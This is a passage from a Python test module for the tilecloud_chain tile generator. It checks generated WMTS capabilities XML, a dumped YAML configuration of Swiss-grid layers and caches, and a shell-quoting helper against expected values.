template=\"http://wmts2/tiles/1.0.0/polygon2/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts3/tiles/1.0.0/polygon2/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_01</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid_01</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>3571.4285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>1875</MatrixWidth>\n <MatrixHeight>1250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_2</ows:Identifier>\n <ScaleDenominator>714.28571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>9375</MatrixWidth>\n <MatrixHeight>6250</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>0_1</ows:Identifier>\n <ScaleDenominator>357.14285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>18750</MatrixWidth>\n <MatrixHeight>12500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_025</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0_25</ows:Identifier>\n <ScaleDenominator>892.85714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>7500</MatrixWidth>\n <MatrixHeight>5000</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_2_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>2_5</ows:Identifier>\n <ScaleDenominator>8928.5714285[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>750</MatrixWidth>\n <MatrixHeight>500</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n <TileMatrixSet>\n <ows:Identifier>swissgrid_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>178571.42857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>38</MatrixWidth>\n <MatrixHeight>25</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>2</ows:Identifier>\n <ScaleDenominator>71428.571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>94</MatrixWidth>\n <MatrixHeight>63</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>3</ows:Identifier>\n 
<ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>4</ows:Identifier>\n <ScaleDenominator>17857.142857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>375</MatrixWidth>\n <MatrixHeight>250</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n </Contents>\n</Capabilities>\"\"\"\n )\n\n def test_multi_host_capabilities(self) -> None:\n gene = TileGeneration(\"tilegeneration/test-fix.yaml\", configure_logging=False)\n self.assert_result_equals(\n controller.get_wmts_capabilities(gene, \"multi_host\"), self.MULTIHOST_CAPABILITIES, True\n )\n\n def test_capabilities_slash(self) -> None:\n gene = TileGeneration(\"tilegeneration/test-capabilities.yaml\", configure_logging=False)\n config = gene.get_config(\"tilegeneration/test-capabilities.yaml\")\n self.assert_result_equals(\n controller.get_wmts_capabilities(gene, config.config[\"generation\"][\"default_cache\"]),\n r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n<Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n </ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>no_dim</ows:Title>\n <ows:Identifier>no_dim</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/no_dim/default/\"\"\"\n \"\"\"{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>one</ows:Title>\n <ows:Identifier>one</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/one/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>two</ows:Title>\n <ows:Identifier>two</ows:Identifier>\n <Style 
isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2012</Value>\n </Dimension>\n <Dimension>\n <ows:Identifier>LEVEL</ows:Identifier>\n <Default>1</Default>\n <Value>1</Value>\n <Value>2</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/two/default/\"\"\"\n \"\"\"{DATE}/{LEVEL}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n </Contents>\n</Capabilities>\"\"\",\n True,\n )\n\n def test_multi_url_capabilities(self) -> None:\n gene = TileGeneration(\"tilegeneration/test-fix.yaml\", configure_logging=False)\n self.assert_result_equals(\n controller.get_wmts_capabilities(gene, \"multi_url\"), self.MULTIHOST_CAPABILITIES, True\n )\n\n CONFIG = \"\"\"\ncaches:\n local:\n folder: /tmp/tiles\n http_url: http://wmts1/tiles/\n type: filesystem\n wmtscapabilities_file: 1.0.0/WMTSCapabilities.xml\n mbtiles:\n folder: /tmp/tiles/mbtiles\n http_url: http://wmts1/tiles/\n type: mbtiles\n multi_host:\n folder: /tmp/tiles\n hosts:\n - wmts1\n - wmts2\n - wmts3\n http_url: http://%(host)s/tiles/\n type: filesystem\n multi_url:\n folder: /tmp/tiles\n http_urls:\n - http://wmts1/tiles/\n - http://wmts2/tiles/\n - http://wmts3/tiles/\n type: filesystem\n s3:\n bucket: tiles\n cache_control: public, max-age=14400\n folder: tiles\n host: s3-eu-west-1.amazonaws.com\n http_url: https://%(host)s/%(bucket)s/%(folder)s/\n type: s3\ncost:\n cloudfront:\n download: 0.12\n get: 0.009\n request_per_layers: 10000000\n s3:\n download: 0.12\n get: 0.01\n put: 0.01\n storage: 0.125\n sqs:\n request: 0.01\ngeneration:\n default_cache: local\n default_layers:\n - line\n - polygon\n error_file: error.list\n maxconsecutive_errors: 2\n number_process: 1\ngrids:\n swissgrid_01:\n bbox:\n - 420000\n - 30000\n - 900000\n - 350000\n matrix_identifier: resolution\n proj4_literal: +proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=600000 +y_0=200000 +ellps=bessel\n +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\n resolution_scale: 10\n resolutions:\n - 1\n - 0.2\n - 0.1\n srs: EPSG:21781\n tile_size: 256\n unit: m\n swissgrid_025:\n bbox:\n - 420000\n - 30000\n - 900000\n - 350000\n matrix_identifier: resolution\n proj4_literal: +proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=600000 +y_0=200000 +ellps=bessel\n +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\n resolution_scale: 4\n resolutions:\n - 0.25\n srs: EPSG:21781\n tile_size: 256\n unit: m\n swissgrid_2_5:\n bbox:\n - 420000\n - 30000\n - 900000\n - 
350000\n matrix_identifier: resolution\n proj4_literal: +proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=600000 +y_0=200000 +ellps=bessel\n +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\n resolution_scale: 2\n resolutions:\n - 2.5\n srs: EPSG:21781\n tile_size: 256\n unit: m\n swissgrid_5:\n bbox:\n - 420000\n - 30000\n - 900000\n - 350000\n matrix_identifier: zoom\n proj4_literal: +proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=600000 +y_0=200000 +ellps=bessel\n +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\n resolution_scale: 1\n resolutions:\n - 100\n - 50\n - 20\n - 10\n - 5\n srs: EPSG:21781\n tile_size: 256\n unit: m\nlayers:\n all:\n bbox:\n - 550000.0\n - 170000.0\n - 560000.0\n - 180000.0\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n extension: png\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: point,line,polygon\n meta: false\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n line:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_metatile_detection:\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n size: 20743\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.line\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache\n layers: line\n meta: true\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n params:\n PARAM: value\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n mapnik:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n data_buffer: 128\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.polygon\n grid: swissgrid_5\n layers: __all__\n mapfile: mapfile/test.mapnik\n meta: false\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n output_format: png\n px_buffer: 0\n type: mapnik\n wmts_style: default\n mapnik_grid:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n data_buffer: 128\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n extension: json\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.polygon\n grid: swissgrid_5\n layers: __all__\n layers_fields:\n line:\n - name\n point:\n - name\n polygon:\n - name\n mapfile: mapfile/test.mapnik\n meta: false\n meta_buffer: 128\n meta_size: 8\n mime_type: application/utfgrid\n output_format: grid\n px_buffer: 0\n resolution: 16\n type: mapnik\n wmts_style: default\n mapnik_grid_drop:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n 
data_buffer: 128\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n drop_empty_utfgrid: true\n extension: json\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.polygon\n grid: swissgrid_5\n layers: __all__\n layers_fields:\n point:\n - name\n mapfile: mapfile/test.mapnik\n meta: false\n meta_buffer: 0\n meta_size: 8\n mime_type: application/utfgrid\n output_format: grid\n px_buffer: 0\n resolution: 16\n type: mapnik\n wmts_style: default\n point:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.point\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: point\n meta: true\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n min_resolution_seed: 10\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n point_hash:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_metatile_detection:\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n size: 20743\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.point\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: point\n meta: true\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n min_resolution_seed: 10\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n point_hash_no_meta:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: point\n meta: false\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n point_px_buffer:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_metatile_detection:\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n size: 20743\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.point\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: point\n meta: true\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n px_buffer: 100\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n polygon:\n cost:\n metatile_generation_time: 30\n 
tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_metatile_detection:\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n size: 20743\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.polygon\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: polygon\n meta: false\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n polygon2:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_metatile_detection:\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n size: 20743\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.polygon\n grid: swissgrid_01\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: polygon\n meta: true\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\nmetadata:\n abstract: Some abstract\n access_constraints: None\n fees: None\n keywords:\n - some\n - keywords\n servicetype: OGC WMTS\n title: Some title\nopenlayers:\n center_x: 600000\n center_y: 200000\n zoom: 3\n srs: EPSG:21781\n proj4js_def: +proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=2600000 +y_0=1200000 +ellps=bessel\n +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\nprovider:\n contact:\n info:\n address:\n area: BE\n city: Berne\n country: Switzerland\n delivery: Address delivery\n email: [email protected]\n postal_code: 3000\n phone:\n fax: +41 11 222 33 44\n voice: +41 11 222 33 44\n name: The contact name\n position: The position name\n name: The provider name\n url: The provider URL\nsns:\n region: eu-west-1\n topic: arn:aws:sns:eu-west-1:your-account-id:tilecloud\nsqs:\n queue: sqs_point\n \"\"\"\n\n def test_config(self) -> None:\n self.assert_cmd_yaml_equals(\n cmd=\".build/venv/bin/generate_controller --dump-config -c tilegeneration/test-fix.yaml\",\n main_func=controller.main,\n expected=self.CONFIG,\n )\n\n def test_config_line(self) -> None:\n self.assert_cmd_yaml_equals(\n cmd=\".build/venv/bin/generate_controller -l line --dump-config -c tilegeneration/test-fix.yaml\",\n main_func=controller.main,\n expected=self.CONFIG,\n )\n\n def test_quote(self) -> None:\n from tilecloud_chain import quote\n\n self.assertEqual(quote(\"abc\"), \"abc\")\n self.assertEqual(quote(\"a b c\"), \"'a b c'\")\n self.assertEqual(quote(\"'a b c'\"), \"\\\"'a b c'\\\"\")\n self.assertEqual(quote('\"a b c\"'), \"'\\\"a b c\\\"'\")\n self.assertEqual(quote(\"a\\\" b' c\"), \"'a\\\" b\\\\' c'\")\n self.assertEqual(quote(\"a'bc\"), '\"a\\'bc\"')\n self.assertEqual(quote(\"a'b\\\"c\"), \"'a\\\\'b\\\"c'\")\n self.assertEqual(quote('ab\"c'), \"'ab\\\"c'\")\n self.assertEqual(quote(\"\"), \"''\")\n\n def test_legends(self) -> None:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_controller -c 
tilegeneration/test-legends.yaml --legends\",\n main_func=controller.main,\n directory=\"/tmp/tiles/1.0.0/\",\n tiles_pattern=\"%s/default/legend%i.png\",\n tiles=[(\"point\", 0), (\"line\", 0), (\"line\", 2), (\"polygon\", 0), (\"all\", 0), (\"all\", 2)],\n )\n\n gene = TileGeneration(\"tilegeneration/test-legends.yaml\", configure_logging=False)\n config = gene.get_config(\"tilegeneration/test-legends.yaml\")\n self.assert_result_equals(\n controller.get_wmts_capabilities(gene, config.config[\"generation\"][\"default_cache\"]),\n r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n<Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n </ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>all</ows:Title>\n <ows:Identifier>all</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/all/default/legend0.png\" \"\"\"\n \"\"\"width=\"[0-9]*\" height=\"[0-9]*\" minScaleDenominator=\"112938.48786[0-9]*\" />\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/all/default/legend2.png\" \"\"\"\n \"\"\"width=\"[0-9]*\" height=\"[0-9]*\" maxScaleDenominator=\"112938.48786[0-9]*\" />\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/all/default/\"\"\"\n r\"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>line</ows:Title>\n <ows:Identifier>line</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/line/default/legend0.png\" \"\"\"\n r\"\"\"width=\"[0-9]*\" height=\"[0-9]*\" minScaleDenominator=\"112938.48786[0-9]*\" />\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/line/default/legend2.png\" \"\"\"\n r\"\"\"width=\"[0-9]*\" height=\"[0-9]*\" maxScaleDenominator=\"112938.48786[0-9]*\" />\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n 
template=\"http://wmts1/tiles/1.0.0/line/default/\"\"\"\n r\"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point</ows:Title>\n <ows:Identifier>point</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/point/default/legend0.png\" \"\"\"\n \"\"\"width=\"[0-9]*\" height=\"[0-9]*\" />\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon</ows:Title>\n <ows:Identifier>polygon</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/polygon/default/legend0.png\" \"\"\"\n \"\"\"width=\"[0-9]*\" height=\"[0-9]*\" />\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n 